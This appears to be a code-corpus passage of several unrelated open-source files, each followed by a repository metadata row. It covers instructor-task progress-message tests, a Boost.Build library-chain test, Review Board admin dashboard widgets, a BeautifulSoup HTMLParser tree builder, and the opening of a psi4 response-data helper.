def test_update_progress_to_success(self):
output = self._get_output_for_task_success(10, 8, 10)
self.assertEquals(output['message'], "Problem rescored for 8 of 10 students")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_state'], SUCCESS)
self.assertFalse(output['in_progress'])
expected_progress = {
'attempted': 10,
'succeeded': 8,
'total': 10,
'action_name': 'rescored',
}
self.assertEquals(output['task_progress'], expected_progress)
def test_success_messages(self):
output = self._get_output_for_task_success(0, 0, 10)
self.assertEqual(output['message'], "Unable to find any students with submissions to be rescored (out of 10)")
self.assertFalse(output['succeeded'])
output = self._get_output_for_task_success(10, 0, 10)
self.assertEqual(output['message'], "Problem failed to be rescored for any of 10 students")
self.assertFalse(output['succeeded'])
output = self._get_output_for_task_success(10, 8, 10)
self.assertEqual(output['message'], "Problem rescored for 8 of 10 students")
self.assertFalse(output['succeeded'])
output = self._get_output_for_task_success(9, 8, 10)
self.assertEqual(output['message'], "Problem rescored for 8 of 9 students (out of 10)")
self.assertFalse(output['succeeded'])
output = self._get_output_for_task_success(10, 10, 10)
self.assertEqual(output['message'], "Problem successfully rescored for 10 students")
self.assertTrue(output['succeeded'])
output = self._get_output_for_task_success(0, 0, 1, student=self.student)
self.assertTrue("Unable to find submission to be rescored for student" in output['message'])
self.assertFalse(output['succeeded'])
output = self._get_output_for_task_success(1, 0, 1, student=self.student)
self.assertTrue("Problem failed to be rescored for student" in output['message'])
self.assertFalse(output['succeeded'])
output = self._get_output_for_task_success(1, 1, 1, student=self.student)
self.assertTrue("Problem successfully rescored for student" in output['message'])
self.assertTrue(output['succeeded'])
def test_email_success_messages(self):
output = self._get_email_output_for_task_success(0, 0, 10)
self.assertEqual(output['message'], "Unable to find any recipients to be emailed (out of 10)")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(10, 0, 10)
self.assertEqual(output['message'], "Message failed to be emailed for any of 10 recipients ")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(10, 8, 10)
self.assertEqual(output['message'], "Message emailed for 8 of 10 recipients")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(9, 8, 10)
self.assertEqual(output['message'], "Message emailed for 8 of 9 recipients (out of 10)")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(10, 10, 10)
self.assertEqual(output['message'], "Message successfully emailed for 10 recipients")
self.assertTrue(output['succeeded'])
output = self._get_email_output_for_task_success(0, 0, 10, skipped=3)
self.assertEqual(output['message'], "Unable to find any recipients to be emailed (skipping 3) (out of 10)")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(10, 0, 10, skipped=3)
self.assertEqual(output['message'], "Message failed to be emailed for any of 10 recipients (skipping 3)")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(10, 8, 10, skipped=3)
self.assertEqual(output['message'], "Message emailed for 8 of 10 recipients (skipping 3)")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(9, 8, 10, skipped=3)
self.assertEqual(output['message'], "Message emailed for 8 of 9 recipients (skipping 3) (out of 10)")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(10, 10, 10, skipped=3)
self.assertEqual(output['message'], "Message successfully emailed for 10 recipients (skipping 3)")
self.assertTrue(output['succeeded'])
def test_get_info_for_queuing_task(self):
# get status for a task that is still running:
instructor_task = self._create_entry()
succeeded, message = get_task_completion_info(instructor_task)
self.assertFalse(succeeded)
self.assertEquals(message, "No status information available")
def test_get_info_for_missing_output(self):
# check for missing task_output
instructor_task = self._create_success_entry()
instructor_task.task_output = None
succeeded, message = get_task_completion_info(instructor_task)
self.assertFalse(succeeded)
self.assertEquals(message, "No status information available")
def test_get_info_for_broken_output(self):
# check for non-JSON task_output
instructor_task = self._create_success_entry()
instructor_task.task_output = "{ bad"
succeeded, message = get_task_completion_info(instructor_task)
self.assertFalse(succeeded)
self.assertEquals(message, "No parsable status information available")
def test_get_info_for_empty_output(self):
# check for JSON task_output with missing keys
instructor_task = self._create_success_entry()
instructor_task.task_output = "{}"
succeeded, message = get_task_completion_info(instructor_task)
self.assertFalse(succeeded)
self.assertEquals(message, "No progress status information available")
def test_get_info_for_broken_input(self):
# check for non-JSON task_input, but then just ignore it
instructor_task = self._create_success_entry()
instructor_task.task_input = "{ bad"
succeeded, message = get_task_completion_info(instructor_task)
self.assertFalse(succeeded)
self.assertEquals(message, "Status: rescored 2 of 3 (out of 5)")
| agpl-3.0 | 4,168,649,275,704,459,000 | 45.398438 | 118 | 0.639053 | false |
yxcoin/yxcoin | src/boost_1_55_0/tools/build/v2/test/library_chain.py | 44 | 3427 | #!/usr/bin/python
# Copyright 2003, 2004, 2005, 2006 Vladimir Prus
# Distributed under the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or http://www.boost.org/LICENSE_1_0.txt)
# Test that a chain of libraries works ok, no matter if we use static or shared
# linking.
import BoostBuild
import os
import string
t = BoostBuild.Tester(use_test_config=False)
# Stage the binary, so that it will be relinked without hardcode-dll-paths.
# That will check that we pass correct -rpath-link, even if not passing -rpath.
t.write("jamfile.jam", """\
stage dist : main ;
exe main : main.cpp b ;
""")
t.write("main.cpp", """\
void foo();
int main() { foo(); }
""")
t.write("jamroot.jam", "")
t.write("a/a.cpp", """\
void
#if defined(_WIN32)
__declspec(dllexport)
#endif
gee() {}
void
#if defined(_WIN32)
__declspec(dllexport)
#endif
geek() {}
""")
t.write("a/jamfile.jam", "lib a : a.cpp ;")
t.write("b/b.cpp", """\
void geek();
void
#if defined(_WIN32)
__declspec(dllexport)
#endif
foo() { geek(); }
""")
t.write("b/jamfile.jam", "lib b : b.cpp ../a//a ;")
t.run_build_system(["-d2"], stderr=None)
t.expect_addition("bin/$toolset/debug/main.exe")
t.rm(["bin", "a/bin", "b/bin"])
t.run_build_system(["link=static"])
t.expect_addition("bin/$toolset/debug/link-static/main.exe")
t.rm(["bin", "a/bin", "b/bin"])
# Check that <library> works for static linking.
t.write("b/jamfile.jam", "lib b : b.cpp : <library>../a//a ;")
t.run_build_system(["link=static"])
t.expect_addition("bin/$toolset/debug/link-static/main.exe")
t.rm(["bin", "a/bin", "b/bin"])
t.write("b/jamfile.jam", "lib b : b.cpp ../a//a/<link>shared : <link>static ;")
t.run_build_system()
t.expect_addition("bin/$toolset/debug/main.exe")
t.rm(["bin", "a/bin", "b/bin"])
# Test that putting a library in sources of a searched library works.
t.write("jamfile.jam", """\
exe main : main.cpp png ;
lib png : z : <name>png ;
lib z : : <name>zzz ;
""")
t.run_build_system(["-a", "-d+2"], status=None, stderr=None)
# Try to find the "zzz" string either in response file (for Windows compilers),
# or in the standard output.
rsp = t.adjust_names("bin/$toolset/debug/main.exe.rsp")[0]
if os.path.exists(rsp) and ( string.find(open(rsp).read(), "zzz") != -1 ):
pass
elif string.find(t.stdout(), "zzz") != -1:
pass
else:
t.fail_test(1)
# Test main -> libb -> liba chain in the case where liba is a file and not a
# Boost.Build target.
t.rm(".")
t.write("jamroot.jam", "")
t.write("a/jamfile.jam", """\
lib a : a.cpp ;
install dist : a ;
""")
t.write("a/a.cpp", """\
#if defined(_WIN32)
__declspec(dllexport)
#endif
void a() {}
""")
t.run_build_system(subdir="a")
t.expect_addition("a/dist/a.dll")
if ( os.name == 'nt' or os.uname()[0].lower().startswith('cygwin') ) and \
BoostBuild.get_toolset() != 'gcc':
# This is a Windows import library -- we know the exact name.
file = "a/dist/a.lib"
else:
file = t.adjust_names("a/dist/a.dll")[0]
t.write("b/jamfile.jam", "lib b : b.cpp ../%s ;" % file)
t.write("b/b.cpp", """\
#if defined(_WIN32)
__declspec(dllimport)
#endif
void a();
#if defined(_WIN32)
__declspec(dllexport)
#endif
void b() { a(); }
""")
t.write("jamroot.jam", "exe main : main.cpp b//b ;")
t.write("main.cpp", """\
#if defined(_WIN32)
__declspec(dllimport)
#endif
void b();
int main() { b(); }
""")
t.run_build_system()
t.expect_addition("bin/$toolset/debug/main.exe")
t.cleanup()
| mit | -2,478,502,187,285,547,000 | 21.546053 | 81 | 0.634958 | false |
brennie/reviewboard | reviewboard/admin/widgets.py | 7 | 17971 | from __future__ import unicode_literals
import datetime
import logging
import re
import time
from django.core.cache import cache
from django.contrib.auth.models import User
from django.db.models.aggregates import Count
from django.db.models.signals import post_save, post_delete
from django.template.context import RequestContext
from django.template.loader import render_to_string
from django.utils import six, timezone
from django.utils.translation import ugettext_lazy as _
from djblets.cache.backend import cache_memoize
from reviewboard.admin.cache_stats import get_cache_stats
from reviewboard.attachments.models import FileAttachment
from reviewboard.changedescs.models import ChangeDescription
from reviewboard.diffviewer.models import DiffSet
from reviewboard.reviews.models import (ReviewRequest, Group,
Comment, Review, Screenshot,
ReviewRequestDraft)
from reviewboard.scmtools.models import Repository
DAYS_TOTAL = 30 # Set the number of days to display in date browsing widgets
NAME_TRANSFORM_RE = re.compile(r'([A-Z])')
primary_widgets = []
secondary_widgets = []
class Widget(object):
"""The base class for an Administration Dashboard widget.
Widgets appear in the Administration Dashboard and can display useful
information on the system, links to other pages, or even fetch data
from external sites.
There are a number of built-in widgets, but extensions can provide their
own.
"""
# Constants
SMALL = 'small'
LARGE = 'large'
# Configuration
widget_id = None
title = None
size = SMALL
template = None
actions = []
has_data = True
cache_data = True
def __init__(self):
"""Initialize the widget."""
self.data = None
self.name = NAME_TRANSFORM_RE.sub(
lambda m: '-%s' % m.group(1).lower(),
self.__class__.__name__)[1:]
def render(self, request):
"""Render the widget.
This will render the HTML for a widget. It takes care of generating
and caching the data, depending on the widget's needs.
"""
if self.has_data and self.data is None:
if self.cache_data:
self.data = cache_memoize(self.generate_cache_key(request),
lambda: self.generate_data(request))
else:
self.data = self.generate_data(request)
return render_to_string('admin/admin_widget.html',
RequestContext(request, {
'widget': self,
}))
def generate_data(self, request):
"""Generate data for the widget.
Widgets should override this to provide extra data to pass to the
template. This will be available in 'widget.data'.
If cache_data is True, this data will be cached for the day.
"""
return {}
def generate_cache_key(self, request):
"""Generate a cache key for this widget's data.
By default, the key takes into account the current day. If the
        widget is displaying data specific to, for example, the user, this should
be overridden to include that data in the key.
"""
syncnum = get_sync_num()
key = "w-%s-%s-%s-%s" % (self.name,
datetime.date.today(),
request.user.username,
syncnum)
return key
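# A minimal sketch of a custom widget, included here only to illustrate the
# subclassing pattern described in the Widget docstring. The widget id, title,
# reused template path and the counts it returns are illustrative assumptions;
# a real widget would be added through register_admin_widget(), defined later
# in this module.
class ExampleCountsWidget(Widget):
    """Example only: displays a couple of object counts."""
    widget_id = 'example-counts-widget'
    title = _('Example Counts')
    template = 'admin/widgets/w-stats.html'
    def generate_data(self, request):
        """Generate data for the widget."""
        return {
            'count_users': User.objects.count(),
            'count_groups': Group.objects.count(),
        }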
def get_sync_num():
    """Get the sync number used to key cached widget data.
    The sync number counts updates and is re-initialized to 1 each day.
"""
KEY = datetime.date.today()
cache.add(KEY, 1)
return cache.get(KEY)
def _increment_sync_num(*args, **kwargs):
"""Increment the sync_num."""
KEY = datetime.date.today()
if cache.get(KEY) is not None:
cache.incr(KEY)
class UserActivityWidget(Widget):
"""User activity widget.
Displays a pie chart of the active application users based on their last
login dates.
"""
widget_id = 'user-activity-widget'
title = _('User Activity')
size = Widget.LARGE
template = 'admin/widgets/w-user-activity.html'
actions = [
{
'url': 'db/auth/user/add/',
'label': _('Add'),
},
{
'url': 'db/auth/user/',
'label': _('Manage Users'),
'classes': 'btn-right',
},
]
def generate_data(self, request):
"""Generate data for the widget."""
now = timezone.now()
users = User.objects
week = datetime.timedelta(days=7)
day = datetime.timedelta(days=1)
month = datetime.timedelta(days=30)
two_months = datetime.timedelta(days=60)
three_months = datetime.timedelta(days=90)
one_day = (now - week, now + day)
seven_days = (now - month, now - week)
thirty_days = (now - two_months, now - month)
sixty_days = (now - three_months, now - two_months)
ninety_days = now - three_months
return {
'now': users.filter(last_login__range=one_day).count(),
'seven_days': users.filter(last_login__range=seven_days).count(),
'thirty_days': users.filter(last_login__range=thirty_days).count(),
'sixty_days': users.filter(last_login__range=sixty_days).count(),
'ninety_days': users.filter(last_login__lte=ninety_days).count(),
'total': users.count()
}
class ReviewRequestStatusesWidget(Widget):
"""Review request statuses widget.
    Displays a pie chart showing review requests by status.
"""
widget_id = 'review-request-statuses-widget'
title = _('Request Statuses')
template = 'admin/widgets/w-request-statuses.html'
def generate_data(self, request):
"""Generate data for the widget."""
public_requests = ReviewRequest.objects.filter(public=True)
return {
'draft': ReviewRequest.objects.filter(public=False).count(),
'pending': public_requests.filter(status="P").count(),
'discarded': public_requests.filter(status="D").count(),
'submit': public_requests.filter(status="S").count()
}
class RepositoriesWidget(Widget):
"""Shows a list of repositories in the system.
This widget displays a table with the most recent repositories,
their types, and visibility.
"""
MAX_REPOSITORIES = 3
widget_id = 'repositories-widget'
title = _('Repositories')
size = Widget.LARGE
template = 'admin/widgets/w-repositories.html'
actions = [
{
'url': 'db/scmtools/repository/add/',
'label': _('Add'),
},
{
'url': 'db/scmtools/repository/',
'label': _('View All'),
'classes': 'btn-right',
},
]
def generate_data(self, request):
"""Generate data for the widget."""
repos = Repository.objects.accessible(request.user).order_by('-id')
return {
'repositories': repos[:self.MAX_REPOSITORIES]
}
def generate_cache_key(self, request):
"""Generate a cache key for this widget's data."""
syncnum = get_sync_num()
key = "w-%s-%s-%s-%s" % (self.name,
datetime.date.today(),
request.user.username,
syncnum)
return key
class ReviewGroupsWidget(Widget):
"""Review groups widget.
Shows a list of recently created groups.
"""
MAX_GROUPS = 5
widget_id = 'review-groups-widget'
title = _('Review Groups')
template = 'admin/widgets/w-groups.html'
actions = [
{
'url': 'db/reviews/group/',
'label': _('View All'),
'classes': 'btn-right',
},
{
'url': 'db/reviews/group/add/',
'label': _('Add'),
},
]
def generate_data(self, request):
"""Generate data for the widget."""
return {
'groups': Group.objects.all().order_by('-id')[:self.MAX_GROUPS]
}
class ServerCacheWidget(Widget):
"""Cache statistics widget.
Displays a list of memcached statistics, if available.
"""
widget_id = 'server-cache-widget'
title = _('Server Cache')
template = 'admin/widgets/w-server-cache.html'
cache_data = False
def generate_data(self, request):
"""Generate data for the widget."""
uptime = {}
cache_stats = get_cache_stats()
if cache_stats:
for hosts, stats in cache_stats:
if stats['uptime'] > 86400:
uptime['value'] = stats['uptime'] / 60 / 60 / 24
uptime['unit'] = _("days")
elif stats['uptime'] > 3600:
uptime['value'] = stats['uptime'] / 60 / 60
uptime['unit'] = _("hours")
else:
uptime['value'] = stats['uptime'] / 60
uptime['unit'] = _("minutes")
return {
'cache_stats': cache_stats,
'uptime': uptime
}
class NewsWidget(Widget):
"""News widget.
Displays the latest news headlines from reviewboard.org.
"""
widget_id = 'news-widget'
title = _('Review Board News')
template = 'admin/widgets/w-news.html'
actions = [
{
'url': 'https://www.reviewboard.org/news/',
'label': _('More'),
},
{
'label': _('Reload'),
'id': 'reload-news',
},
]
has_data = False
class DatabaseStatsWidget(Widget):
"""Database statistics widget.
Displays a list of totals for several important database tables.
"""
widget_id = 'database-stats-widget'
title = _('Database Stats')
template = 'admin/widgets/w-stats.html'
def generate_data(self, request):
"""Generate data for the widget."""
return {
'count_comments': Comment.objects.all().count(),
'count_reviews': Review.objects.all().count(),
'count_attachments': FileAttachment.objects.all().count(),
'count_reviewdrafts': ReviewRequestDraft.objects.all().count(),
'count_screenshots': Screenshot.objects.all().count(),
'count_diffsets': DiffSet.objects.all().count()
}
class RecentActionsWidget(Widget):
"""Recent actions widget.
Displays a list of recent admin actions to the user.
"""
widget_id = 'recent-actions-widget'
title = _('Recent Actions')
template = 'admin/widgets/w-recent-actions.html'
has_data = False
def dynamic_activity_data(request):
    """Large database activity widget helper.
    This method serves as a helper for the activity widget; it is used for
    AJAX requests based on date ranges passed to it.
"""
direction = request.GET.get('direction')
range_end = request.GET.get('range_end')
range_start = request.GET.get('range_start')
days_total = DAYS_TOTAL
# Convert the date from the request.
#
# This takes the date from the request in YYYY-MM-DD format and
    # converts it into a format suitable for QuerySet later on.
if range_end:
range_end = datetime.datetime.fromtimestamp(
time.mktime(time.strptime(range_end, "%Y-%m-%d")))
if range_start:
range_start = datetime.datetime.fromtimestamp(
time.mktime(time.strptime(range_start, "%Y-%m-%d")))
if direction == "next" and range_end:
new_range_start = range_end
new_range_end = \
new_range_start + datetime.timedelta(days=days_total)
elif direction == "prev" and range_start:
new_range_start = range_start - datetime.timedelta(days=days_total)
new_range_end = range_start
elif direction == "same" and range_start and range_end:
new_range_start = range_start
new_range_end = range_end
else:
new_range_end = datetime.datetime.now() + datetime.timedelta(days=1)
new_range_start = new_range_end - datetime.timedelta(days=days_total)
current_tz = timezone.get_current_timezone()
new_range_start = timezone.make_aware(new_range_start, current_tz)
new_range_end = timezone.make_aware(new_range_end, current_tz)
response_data = {
"range_start": new_range_start.strftime("%Y-%m-%d"),
"range_end": new_range_end.strftime("%Y-%m-%d")
}
def large_stats_data(range_start, range_end):
def get_objects(model_name, timestamp_field, date_field):
"""Perform timestamp based queries.
This method receives a dynamic model name and performs a filter
query. Later the results are grouped by day and prepared for the
charting library.
"""
args = '%s__range' % timestamp_field
q = model_name.objects.filter(**{
args: (range_start, range_end)
})
q = q.extra({timestamp_field: date_field})
q = q.values(timestamp_field)
q = q.annotate(created_count=Count('pk'))
q = q.order_by(timestamp_field)
data = []
for obj in q:
data.append([
time.mktime(time.strptime(
six.text_type(obj[timestamp_field]),
"%Y-%m-%d")) * 1000,
obj['created_count']
])
return data
comment_array = get_objects(Comment, "timestamp", "date(timestamp)")
change_desc_array = get_objects(ChangeDescription, "timestamp",
"date(timestamp)")
review_array = get_objects(Review, "timestamp", "date(timestamp)")
rr_array = get_objects(ReviewRequest, "time_added", "date(time_added)")
return {
'change_descriptions': change_desc_array,
'comments': comment_array,
'reviews': review_array,
'review_requests': rr_array
}
stats_data = large_stats_data(new_range_start, new_range_end)
return {
"range": response_data,
"activity_data": stats_data
}
class ActivityGraphWidget(Widget):
"""Detailed database statistics graph widget.
Shows the latest database activity for multiple models in the form of
a graph that can be navigated by date.
This widget shows a daily view of creation activity for a list of models.
All displayed widget data is computed on demand, rather than up-front
during creation of the widget.
"""
widget_id = 'activity-graph-widget'
title = _('Review Board Activity')
size = Widget.LARGE
template = 'admin/widgets/w-stats-large.html'
actions = [
{
'label': '<',
'id': 'db-stats-graph-prev',
'rel': 'prev',
},
{
'label': '>',
'id': 'db-stats-graph-next',
'rel': 'next',
},
{
'label': _('Reviews'),
'classes': 'btn-s btn-s-checked',
'rel': 'reviews',
},
{
'label': _('Comments'),
'classes': 'btn-s btn-s-checked',
'rel': 'comments',
},
{
'label': _('Review Requests'),
'classes': 'btn-s btn-s-checked',
'rel': 'review_requests',
},
{
'label': _('Changes'),
'classes': 'btn-s btn-s-checked',
'rel': 'change_descriptions',
},
]
has_data = False
def init_widgets():
"""Initialize the widgets subsystem.
This will listen for events in order to manage the widget caches.
"""
post_save.connect(_increment_sync_num, sender=Group)
post_save.connect(_increment_sync_num, sender=Repository)
post_delete.connect(_increment_sync_num, sender=Group)
post_delete.connect(_increment_sync_num, sender=Repository)
def register_admin_widget(widget_cls, primary=False):
"""Register an administration widget.
This widget will appear in the list of primary or secondary widgets.
The widget class must have a widget_id attribute set, and can only
    be registered once in a single list. A KeyError will be thrown if
attempting to register a second time.
"""
widget_id = widget_cls.widget_id
if not widget_id:
raise ValueError('The widget_id attribute must be set on %r'
% widget_cls)
if widget_cls in primary_widgets or widget_cls in secondary_widgets:
raise KeyError('"%s" is already a registered administration widget'
% widget_id)
if primary:
primary_widgets.append(widget_cls)
else:
secondary_widgets.append(widget_cls)
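# Illustrative registration calls (the ExampleCountsWidget sketch above is not
# actually registered by this module):
#
#   register_admin_widget(ExampleCountsWidget)                # secondary list
#   register_admin_widget(ExampleCountsWidget, primary=True)  # primary list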
def unregister_admin_widget(widget_cls):
"""Unregister a previously registered administration widget."""
widget_id = widget_cls.widget_id
try:
primary_widgets.remove(widget_cls)
except ValueError:
try:
secondary_widgets.remove(widget_cls)
except ValueError:
logging.error('Failed to unregister unknown administration '
'widget "%s".',
widget_id)
raise KeyError('"%s" is not a registered administration widget'
% widget_id)
# Register the built-in widgets
register_admin_widget(ActivityGraphWidget, True)
register_admin_widget(RepositoriesWidget, True)
register_admin_widget(UserActivityWidget, True)
register_admin_widget(ReviewRequestStatusesWidget)
register_admin_widget(RecentActionsWidget)
register_admin_widget(ReviewGroupsWidget)
register_admin_widget(ServerCacheWidget)
register_admin_widget(NewsWidget)
register_admin_widget(DatabaseStatsWidget)
| mit | 1,413,664,489,425,819,100 | 30.363002 | 79 | 0.583774 | false |
eli-schwartz/Sigil | src/Resource_Files/plugin_launchers/python/sigil_bs4/builder/_htmlparser.py | 6 | 9793 | from __future__ import unicode_literals, division, absolute_import, print_function
import sys
PY3 = sys.version_info[0] == 3
if PY3:
text_type = str
binary_type = bytes
unicode = str
basestring = str
else:
range = xrange
text_type = unicode
binary_type = str
chr = unichr
"""Use the HTMLParser library to parse HTML files that aren't too bad."""
__all__ = [
'HTMLParserTreeBuilder',
]
if PY3:
from html.parser import HTMLParser
try:
from html.parser import HTMLParseError
except ImportError as e:
# HTMLParseError is removed in Python 3.5. Since it can never be
# thrown in 3.5, we can just define our own class as a placeholder.
class HTMLParseError(Exception):
pass
else:
from HTMLParser import HTMLParser
try:
from HTMLParser import HTMLParseError
except ImportError as e:
# HTMLParseError is removed in Python 3.5. Since it can never be
# thrown in 3.5, we can just define our own class as a placeholder.
class HTMLParseError(Exception):
pass
import warnings
# Starting in Python 3.2, the HTMLParser constructor takes a 'strict'
# argument, which we'd like to set to False. Unfortunately,
# http://bugs.python.org/issue13273 makes strict=True a better bet
# before Python 3.2.3.
#
# At the end of this file, we monkeypatch HTMLParser so that
# strict=True works well on Python 3.2.2.
major, minor, release = sys.version_info[:3]
CONSTRUCTOR_TAKES_STRICT = major == 3 and minor == 2 and release >= 3
CONSTRUCTOR_STRICT_IS_DEPRECATED = major == 3 and minor == 3
CONSTRUCTOR_TAKES_CONVERT_CHARREFS = major == 3 and minor >= 4
from sigil_bs4.element import (
CData,
Comment,
Declaration,
Doctype,
ProcessingInstruction,
)
from sigil_bs4.dammit import EntitySubstitution, UnicodeDammit
from sigil_bs4.builder import (
HTML,
HTMLTreeBuilder,
STRICT,
)
HTMLPARSER = 'html.parser'
class BeautifulSoupHTMLParser(HTMLParser):
def handle_starttag(self, name, attrs):
# XXX namespace
attr_dict = {}
for key, value in attrs:
# Change None attribute values to the empty string
# for consistency with the other tree builders.
if value is None:
value = ''
attr_dict[key] = value
attrvalue = '""'
self.soup.handle_starttag(name, None, None, attr_dict)
def handle_endtag(self, name):
self.soup.handle_endtag(name)
def handle_data(self, data):
self.soup.handle_data(data)
def handle_charref(self, name):
# XXX workaround for a bug in HTMLParser. Remove this once
# it's fixed in all supported versions.
# http://bugs.python.org/issue13633
if name.startswith('x'):
real_name = int(name.lstrip('x'), 16)
elif name.startswith('X'):
real_name = int(name.lstrip('X'), 16)
else:
real_name = int(name)
try:
data = chr(real_name)
except (ValueError, OverflowError) as e:
data = "\N{REPLACEMENT CHARACTER}"
self.handle_data(data)
def handle_entityref(self, name):
character = EntitySubstitution.HTML_ENTITY_TO_CHARACTER.get(name)
if character is not None:
data = character
else:
data = "&%s;" % name
self.handle_data(data)
def handle_comment(self, data):
self.soup.endData()
self.soup.handle_data(data)
self.soup.endData(Comment)
def handle_decl(self, data):
self.soup.endData()
if data.startswith("DOCTYPE "):
data = data[len("DOCTYPE "):]
elif data == 'DOCTYPE':
# i.e. "<!DOCTYPE>"
data = ''
self.soup.handle_data(data)
self.soup.endData(Doctype)
def unknown_decl(self, data):
if data.upper().startswith('CDATA['):
cls = CData
data = data[len('CDATA['):]
else:
cls = Declaration
self.soup.endData()
self.soup.handle_data(data)
self.soup.endData(cls)
def handle_pi(self, data):
self.soup.endData()
self.soup.handle_data(data)
self.soup.endData(ProcessingInstruction)
class HTMLParserTreeBuilder(HTMLTreeBuilder):
is_xml = False
picklable = True
NAME = HTMLPARSER
features = [NAME, HTML, STRICT]
def __init__(self, *args, **kwargs):
if CONSTRUCTOR_TAKES_STRICT and not CONSTRUCTOR_STRICT_IS_DEPRECATED:
kwargs['strict'] = False
if CONSTRUCTOR_TAKES_CONVERT_CHARREFS:
kwargs['convert_charrefs'] = False
self.parser_args = (args, kwargs)
def prepare_markup(self, markup, user_specified_encoding=None,
document_declared_encoding=None, exclude_encodings=None):
"""
:return: A 4-tuple (markup, original encoding, encoding
declared within markup, whether any characters had to be
replaced with REPLACEMENT CHARACTER).
"""
if isinstance(markup, unicode):
yield (markup, None, None, False)
return
try_encodings = [user_specified_encoding, document_declared_encoding]
dammit = UnicodeDammit(markup, try_encodings, is_html=True,
exclude_encodings=exclude_encodings)
yield (dammit.markup, dammit.original_encoding,
dammit.declared_html_encoding,
dammit.contains_replacement_characters)
def feed(self, markup):
args, kwargs = self.parser_args
parser = BeautifulSoupHTMLParser(*args, **kwargs)
parser.soup = self.soup
try:
parser.feed(markup)
except HTMLParseError as e:
warnings.warn(RuntimeWarning(
"Python's built-in HTMLParser cannot parse the given document. This is not a bug in Beautiful Soup. The best solution is to install an external parser (lxml or html5lib), and use Beautiful Soup with that parser. See http://www.crummy.com/software/BeautifulSoup/bs4/doc/#installing-a-parser for help."))
raise e
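# Typical usage sketch (kept as a comment to avoid importing the package from
# within this builder module); the import path is an assumption based on the
# sigil_bs4 package layout:
#
#   from sigil_bs4 import BeautifulSoup
#   soup = BeautifulSoup(markup, 'html.parser')   # selects this tree builder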
# Patch 3.2 versions of HTMLParser earlier than 3.2.3 to use some
# 3.2.3 code. This ensures they don't treat markup like <p></p> as a
# string.
#
# XXX This code can be removed once most Python 3 users are on 3.2.3.
if major == 3 and minor == 2 and not CONSTRUCTOR_TAKES_STRICT:
import re
attrfind_tolerant = re.compile(
r'\s*((?<=[\'"\s])[^\s/>][^\s/=>]*)(\s*=+\s*'
r'(\'[^\']*\'|"[^"]*"|(?![\'"])[^>\s]*))?')
HTMLParserTreeBuilder.attrfind_tolerant = attrfind_tolerant
locatestarttagend = re.compile(r"""
<[a-zA-Z][-.a-zA-Z0-9:_]* # tag name
(?:\s+ # whitespace before attribute name
(?:[a-zA-Z_][-.:a-zA-Z0-9_]* # attribute name
(?:\s*=\s* # value indicator
(?:'[^']*' # LITA-enclosed value
|\"[^\"]*\" # LIT-enclosed value
|[^'\">\s]+ # bare value
)
)?
)
)*
\s* # trailing whitespace
""", re.VERBOSE)
BeautifulSoupHTMLParser.locatestarttagend = locatestarttagend
from html.parser import tagfind, attrfind
def parse_starttag(self, i):
self.__starttag_text = None
endpos = self.check_for_whole_start_tag(i)
if endpos < 0:
return endpos
rawdata = self.rawdata
self.__starttag_text = rawdata[i:endpos]
# Now parse the data between i+1 and j into a tag and attrs
attrs = []
match = tagfind.match(rawdata, i+1)
assert match, 'unexpected call to parse_starttag()'
k = match.end()
self.lasttag = tag = rawdata[i+1:k].lower()
while k < endpos:
if self.strict:
m = attrfind.match(rawdata, k)
else:
m = attrfind_tolerant.match(rawdata, k)
if not m:
break
attrname, rest, attrvalue = m.group(1, 2, 3)
if not rest:
attrvalue = None
elif attrvalue[:1] == '\'' == attrvalue[-1:] or \
attrvalue[:1] == '"' == attrvalue[-1:]:
attrvalue = attrvalue[1:-1]
if attrvalue:
attrvalue = self.unescape(attrvalue)
attrs.append((attrname.lower(), attrvalue))
k = m.end()
end = rawdata[k:endpos].strip()
if end not in (">", "/>"):
lineno, offset = self.getpos()
if "\n" in self.__starttag_text:
lineno = lineno + self.__starttag_text.count("\n")
offset = len(self.__starttag_text) \
- self.__starttag_text.rfind("\n")
else:
offset = offset + len(self.__starttag_text)
if self.strict:
self.error("junk characters in start tag: %r"
% (rawdata[k:endpos][:20],))
self.handle_data(rawdata[i:endpos])
return endpos
if end.endswith('/>'):
# XHTML-style empty tag: <span attr="value" />
self.handle_startendtag(tag, attrs)
else:
self.handle_starttag(tag, attrs)
if tag in self.CDATA_CONTENT_ELEMENTS:
self.set_cdata_mode(tag)
return endpos
def set_cdata_mode(self, elem):
self.cdata_elem = elem.lower()
self.interesting = re.compile(r'</\s*%s\s*>' % self.cdata_elem, re.I)
BeautifulSoupHTMLParser.parse_starttag = parse_starttag
BeautifulSoupHTMLParser.set_cdata_mode = set_cdata_mode
CONSTRUCTOR_TAKES_STRICT = True
| gpl-3.0 | -4,331,471,542,079,802,000 | 33.361404 | 318 | 0.579291 | false |
susilehtola/psi4 | psi4/driver/procrouting/findif_response_utils/data_collection_helper.py | 6 | 4102 | #
# @BEGIN LICENSE
#
# Psi4: an open-source quantum chemistry software package
#
# Copyright (c) 2007-2021 The Psi4 Developers.
#
# The copyrights for code used from other parties are included in
# the corresponding files.
#
# This file is part of Psi4.
#
# Psi4 is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, version 3.
#
# Psi4 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with Psi4; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @END LICENSE
#
"""
Module of helper functions for distributed ccresponse computations.
Defines functions for retrieving data computed at displaced geometries.
"""
from psi4.driver import p4util
def collect_displaced_matrix_data(db, signature, row_dim):
"""
Gathers a list of tensors, one at each displaced geometry.
db: (database) the database object for this property calculation
signature: (string) The string that notifies the matrix reader that the
targeted tensor data begins.
    row_dim: (int) the expected number of rows the tensor data is printed
    across in the output file
Returns a 2d list result[i][j]:
i: indexes displacements
